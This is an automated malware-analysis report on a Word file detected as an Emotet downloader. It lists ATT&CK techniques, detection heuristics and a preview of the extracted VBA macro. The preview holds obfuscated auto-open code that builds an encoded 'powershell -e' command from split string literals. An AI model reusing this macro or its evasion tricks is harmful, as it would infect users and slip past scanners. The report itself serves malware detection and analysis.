MALICIOUS
342
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1059 Command and Scripting Interpreter
The sample contains a VBA macro with an AutoOpen function, a common Emotet infection vector. The macro uses obfuscated API calls, specifically reassembling 'winmgmts' from split string literals, to launch a WMI process. This is a strong indicator of a downloader attempting to fetch and execute a secondary payload.
Heuristics 9
-
ClamAV: Doc.Downloader.Emotet-6894115-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-6894115-0
-
VBA macros detected medium 5 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATEVBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
-
Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATIONVBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 44817 bytes |
SHA-256: a60e15b2297789cf7283e8a5257e5d84478b85ecbc09a527fd8bbf8996ea926c |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "LUDoB_BX" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function dABGZwD_() If DBAACUUX = HD4BkAAG Then mXZDUDXQ = 908747219 * Rnd(783319556) / iAAk_AA - CInt(364563485 + cAwBAAAQ) * 619917209 + Sgn(476302689 + Tan(LoADX4Z)) bABZCA = (mAAAxA_o / Rnd(cUDA4A) - oQDC_BD * Sqr(445063720) - hDXAxA - CLng(iAXwB_AU - vDABZBAw / JUAB4XAA - 997032036)) End If If KDcA4CA = hAAA4ADw Then ZcwZGUBG = 637588028 * CBool(775576344) / v1AoAA - Rnd(538152896 + DUcZQUA) * 362250820 + Sqr(315050795 + Cos(DwU4c4)) A144U4A = (lUDUQAA / Fix(AoGQ1A) - zUAAoA * CInt(423877329) - T_D4ACQ1 - CInt(AQQocAAB - Lc1XD4kA / jABQCcXA - 113623250)) End If If VQwkUGDB = YxBxX4 Then tBQAAcX = 747845168 * CLng(678396883) / cG4kccx - Sqr(637359119 + zXUDG_) * 717945521 + CDbl(659763181 + Cos(H_ZGAwk)) zCckAQ = (u4xXCGUo / CSng(zBZ_DA) - DXADABA * CInt(379412131) - ADDBwA - Rnd(LDXAkQ - IGAZoB / XAAQBAAB - 116374633)) End If If dBX1QU = jAUZQAD1 Then HZBUkG = 164454885 * CDate(756196909) / LBCADAA - Int(476256828 + d_AABGB) * 414074015 + Sin(676941060 + CDate(awxG4AA)) GxwQGBk = (tA4AQB / Fix(QBABAD) - kAACQxxA * Sgn(135066478) - MoBcBQA - CDate(toGAxZA4 - TCAGCwXk / hoZAAAwU - 569750706)) End If If iDAc_AD = EUAAkAAB Then jZQAC4A = 395763500 * CSng(939469373) / awow11 - CDate(868246388 + sBQXkBUw) * 18316220 + CDbl(523427967 + Sin(fABoBAk)) BAwABA = (pAAoBGD / CBool(jDwkDAC) - zxD_GAAQ * Sqr(826087830) - cQUwAwo - CByte(nBAAAcx - hAAAGA / QCQ41B - 673375313)) End If If tAA1BQ = jwwxQDo Then XcUAQwDA = 654363268 * Fix(610489983) / CDDCAAAZ - Cos(197531150 + wBDAAAZA) * 643882869 + CDate(807348562 + CSng(uBAkUUZ)) CCAAADkA = (aAAAZGB / Tan(HoAADQXD) - cQUUAAA * CStr(457100833) - zDUxA_A - Tan(VAkAAQA - b4CcDG / pD_ZBwDo - 737586368)) End If If HDUZxUUC = BDxAAG Then PAA__A = 101709251 * Round(893818408) / PwoABA - CStr(667987294 + a_AAAw4) * 850484326 + Fix(360567503 + CByte(tAA__1)) vGUkBAAA = (pkU1D_ / Round(zAAoXA) - KAUUA1Q * Sgn(990685738) - FAG1AZD4 - Sqr(o4cDGA - VA_GZA / RBAZAUA - 115456148)) End If End Function Sub autoopen() On Error Resume Next If rQk4coQ = XkABZc Then mQ11wA = 619461325 * Sgn(997135299) / nUUoAX - Oct(254130753 + pA1xBwAA) * 159660859 + Fix(753509373 + CInt(ZAZBZZ14)) fXUADAB = (QAXxU_A / CLng(WD_AA_) - uAGUCDA1 * CStr(812138373) - EAAoXk - CDbl(PoAUQAwA - SAA_AB / vDUDAo - 357041774)) End If If tcD1xB = cDXDDBA Then DAoAAGQ = 302218790 * Sin(895346344) / ooQBQZUA - Round(838533263 + EZAUQUAo) * 136137417 + Sgn(895307384 + CLng(dACAUA)) HZABGB4B = (FAUXQD / CDbl(GBBxwcAB) - iBUAxA * CStr(754893039) - YACk4AC - Log(QUABxC - HkAAAADD / ZQ4AAC - 29900685)) End If cGABD1AZ (UZAkUBcA + "po" + vAACwA_ + "wersh" + foXDow + "ell -e " + ZAcAAx + HAxDU1AD + jZDQBUA + uADDAXA + BAGAQUQw + kwxGQBQx + SAoBAAU + WcAZCAXx) If Gx_AZQB = CBUkBxQ Then ZGDZCAB = 321251206 * Hex(542075290) / iUQ1AB - CDate(343847826 + nGoUxAD) * 671405924 + CDate(245437121 + Round(aBx4_XAA)) JxBACA = (tAUGkAB / CStr(ZxAADAQA) - IAAw1B14 * Log(659097208) - EBxADGx - Hex(KQGwAxUA - BDXGABAZ / rwXZDUAA - 895977649)) End If If wAAADBA = vB1AAABU Then DADAAA = 464699598 * Sqr(430394639) / EQBADDA - Log(921150468 + VQAo4CD1) * 313306871 + Sgn(897746881 + Fix(XZQDAUA)) UBUAUcA = (nCAUAQ / Sin(HQcXkc1) - TkcAAx * CByte(73499965) - wDAwcU - CBool(GAAAGc - NkB_1B / Q4Z1Qk - 928271549)) End If If QAAkZA = RGQADAQA Then jABAZA1A = 214501898 * CBool(971835315) / DXCwA4 - CDbl(485878472 + j_xDACQA) * 955855690 + Sgn(443496346 + Atn(oBC4BAZA)) zAkABDo = (n4ACQQ / CInt(TAAAQZ) - jxA_Xc * Int(271651661) - YkCAD_ - Int(NAwU4AD - FA4A_UU / EwAcQA4o - 315179225)) End If End Sub Function B1BGAU() If OcoAGAA = qxAUZk Then EAQD4Q = 956774524 * Oct(750167552) / rAGwxwA - Hex(653517164 + AQAUADZU) * 729122769 + CDate(33078220 + Sin(YAAZQDG_)) NA4GD4c = (soAABkA / Atn(CAxDUxC) - ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.